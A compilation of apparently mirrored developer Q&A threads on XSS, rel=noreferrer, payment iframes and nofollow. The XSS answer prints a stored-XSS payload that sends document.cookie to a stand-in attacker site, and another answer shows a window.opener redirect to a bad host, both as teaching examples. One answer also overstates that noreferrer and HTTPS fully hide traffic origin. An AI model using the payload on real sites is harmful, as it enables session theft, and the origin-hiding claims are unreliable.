We Keep Coding

XSS: Rewrite the content of the HTML page?

Regarding XSS, OWASP states (intro paragraph):
These scripts can even rewrite the content of the HTML page
As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their html files, which clearly no user without specific server access can do.
When I cannot do it as a user, how can possibly a maliciously injected script from facebook.com, executed by my browser, rewrite the contents of facebook.com?

As a user, I cannot rewrite the contents of facebook.com
You could if Facebook didn't protect well against XSS. Sites that don't escape user-generated text for usage in the context of HTML are vulnerable to having arbitrary script injected into the page. Your Facebook post could contain a <script> tag, for example.
That would require me to permanently alter their html files, which clearly no user without specific server access can do.
No, you could simply modify the page client-side once your malicious script is loaded. No need to actually modify the original page to have the effect of wiping out the page. For example:
document.body.innerHTML = '';

Let me give some example. Let's imagine Facebook lets its users to save a link to externally hosted avatar at user's profile. And this avatar is shown near user's nickname. Also let's imagine that Facebook does not protect itself against XSS (it really does, but we need this assumption).
Then the attacker can use such text instead of avatar link:
javascript:alert('You are hacked')
Facebook's HTML code displaying avatar may look as:
<img src="javascript:alert('You are hacked')"></img>
Then attacker will see that alert when he opens his profile. Doesn't look very dangerous, does it?
But take care: Facebook has a news feed. Let the attacker write some post - and all his friends will see the alert on their newsfeed page.
And to finalize: instead of alert the attacker will be able to get user's Facebook cookies and send them to attacker's site:
<script>window.location = 'attackerssite.com?cookie=' + document.cookie</script>
And then he'll collect victim's cookies from his server's access log. Now it is a real hazard, do you agree?
Note. Here I described stored XSS: it is probably the most dangerous type of XSS that can affect many users at once. The other types of XSS (described in other answers to this question) may affect current user - but that doesn't mean they are not dangerous: for example they can steal user's cookies as well.

When should I use rel=noreferrer?

I have to link some other external sites.
I know when to use nofollow. But I am not clear when I should use rel=noreferrer.

In short, the noreferrer link type hides referrer information when the link is clicked. A link with the noreferrer link type looks something like this:
Click here for more info
If someone arrives at your site from a link that uses this link type, your analytics won't show who refered that link. Instead, it will mistakenly show as direct traffic in your acquisition channels report.
If you have an external link to someone else's site you don't trust and you want to hide referrer information then you can combine both and use
Other Domain Link
I advise you to use nofollow links for the following content:
Links in comments or on forums - Anything that has user-generated content is likely to be a source of spam. Even if you carefully moderate, things will slip through.
Advertisements & sponsored links - Any links that are meant to be advertisements or are part of a sponsorship arrangement must be nofollowed.
Paid links - If you charge in any way for a link (directory submission, quality assessment, reviews, etc.), nofollow the outbound links

noreferrer doesn't just block the HTTP referrer header, it also prevents a Javascript exploit involving window.opener
Link
Looks innocuous enough, but there's a hole because, by default, the page that's being opened is allowing the opened page to call back into it via window.opener. There are some restrictions, being cross-domain, but there's still some mischief that can be done
window.opener.location = 'http://gotcha.badstuff';
With noreferrer most browsers will disallow the window.opener exploit

As #unor said, it hides referrer information when the link is clicked. Basically this is a privacy enhancement for when you want to hide from the owner of the linked domain that the user came from your website.
Example:
User is on your website www.mywebsite.com, there you have a Link. When someone clicks the "Link" the owner of newsite.com knows it came from www.mywebsite.com. By setting rel=noreferrer you prevent revealing this information.
A good example how it works is starting from 21:28 of this conference talk. This is considered to be a good practice when working with server-side (e.g. Node.js). You can also read about this on the Helmet documentation.

You'll o ly need to use this on private pages or pages you dont want to advertise. E.g. a webmail or private bug tracker would be considered private and you don't want to leak any information to the external linked websites.
Sensitive public pages, like medical information or other sensitive topics may also want to mask the referrer header.

How to hide the link/click origin?

I have a website with promotional content. Let's call it website A. On this website, I give a URL to an advertiser website where people are buying something. Let's call it website B.
If I use rel="noreferrer" (like here: How can I hide a link's origin from the linked-to site's analytics?), is it possible for the owner of website B to find out where does the traffic come from?
I want to hide the origin of the users so I am secured.

It is not possible for the owner of site B to find out where the traffic comes from.
Readers can click on the links, but the destination site will not see that they came from your site.
Source
You can also use HTTPS, which will not send any referral information.
In summary, you're secure.

Is it safe use an iframe for a payment?

I have this question: is safe use an iframe to load the page where the customer will do the payment. For example paypal or DineroMail or the page that does the credit card payment.
Because My boss wants that the customer feels that never leaves the site so in my site I added an iframe (and inside this I load the url of the payment) but don't know if is correct and safe or no.
Thanks.

From a technical security point of view (Same Origin Policy), it is exactly as safe to open an iframe as it is to open a new tab.
From a UI point of view, opening an iframe in certain locations can deceive the user and you might be accused of trying to clickjack the user into making an inadvertent payment if you are not careful.
I cannot say anything about PayPal's own policy, but you should make sure they are okay with it.

I have been through this several times with many clients. A lot of it has to do with 1)he isnt comfortable with a customer leaving his site in fear the checkout wont occour or 2) its a pride thing that he wants clients to feel all the services can be performed in site.
One of the things that your boss needs to understand is that people like using paypal because they are trusted and its a familiar process to them. He needs to know that not only are people ok with being redirected to paypal, but they expect it. If I where to run into a site where they checked me out in an iFrame on paypal it would be a red flag for me. Why? Because with the redirect I can see the address bar. I know that Im at paypals site and I can see if its a secure connection.
If he is dead set on a customer never leaving a site. He needs to do something like paypal payments pro. This is probably the solution he really wants.
EDIT
I found your answer answer when dealing with the same issue myself last weekend and wanted to come back with something better!
Its called flex and its apart of the adaptive payments classic api. Which will take an additional application process which your boss may fee is well worth it.
https://developer.paypal.com/docs/classic/adaptive-payments/integration-guide/APIntro/
Head about 3/4 of the way down and youll see step by step instructions to do exactly what your loooking for. A secure paypal iframe.
Quick tip: If you have to incorporate it in your own processes simply do the following.
1) obtain your paykey after sending the request to paypal.
2) call in the javascript source as in the tutorial.
3) redirect the window manually as opposed to their created paypal button. aka https://www.paypal.com/webapps/adaptivepayment/flow/pay?paykey=YOURPAYKEY
another good source is : https://www.paypalobjects.com/webstatic/en_US/developer/docs/pdf/pp_adaptivepaymentsmobile.pdf

It is safe if Paypal allow it, but you have to be careful from a UI point of view.
If your site is loaded over http and you load the IFrame within your site, it appears to the user not to be secure even though the IFrame is loaded over https. This approach is also vulnerable to a MiTM attack as an attacker could intercept and change the IFrame URL to something like http://www.evil.com and nobody would be the wiser at the time of entering the card details.
If your site is loaded over https your customer has to trust you with their card details as they cannot be sure that the IFrame is actually pointing to the Paypal domain on https (https://www.paypal.com) and not your site. Yes they could right click and check the source, but this is a step too far for most users and technically an evil site could swap the IFrame for an evil version without the customer noticing.
My recommendation is to actually redirect to https://www.paypal.com because then it is shown in the address bar with a padlock and reassures users that they are giving their details to Paypal and nobody else.

If I put a rel="nofollow" will the referrer site will appear on Google Analytics of example.com?

If I put a rel="nofollow" will the referrer site will appear on Google Analytics of example.com?
Example:
Referrer site is: referrer.com

nofollow is intended to prevent the bot from going TO the site in the link (or any link if it's in a meta tag).
ie: Site-A has a link:
<a rel="nofollow" href="//site-b.com">Site-B</a>
That nofollow is meant to tell Google that it shouldn't consider the two sites to be linked together.
Or two pages, or whatever.
<meta name="robots" content="noindex">
Tells Google that it shouldn't index THIS page in its search.
In your case, you're looking for a way to remove the JavaScript:document.referrer from Site-B. You can't do that from Site-A. When a user clicks from Site-A to Site-B, once they're on Site-B (where GA is installed), there's nothing that you can do from Site-A to prevent it.
There's no way to do that, without sending a user to your own server, and manually redirecting to/from elsewhere, using apache, or using some other server-side solution... Even then, the referral will come from somewhere -- it's just a case of where that somewhere, is.
HOWEVER if you're talking about two sites that YOU OWN and you're trying to exclude Site-A from Site-B's reporting, there are ways of doing that from within the GA control panel. You can add filters on the traffic to exclude IPs or domains.
Or, if you control the GA tracking codes on Site-B, you can do:
_gaq.push(["_addIgnoredRef", "Site-A.com"]);
If, however, you're working for Company-A, and you don't want people in Company-B to see your site in their report... ...that's where it can't be done without serious server-side header-manipulation.

No Change
clicking a link with rel="nofollow" will still send the current page as the referer.
A User browsing is not influenced by rel="nofollow"
nofollow applies to bots (site crawlers), google analytics tracks users (who are not bots). As such the nofollow on a link will have no effect on google analytics statistics - because it doesn't modify real-user activity.

Yes, it will appear as a referer. Nofollow tells robots not to follow this link and doesn't affect clients browser behaviour in any way.
http://en.wikipedia.org/wiki/Nofollow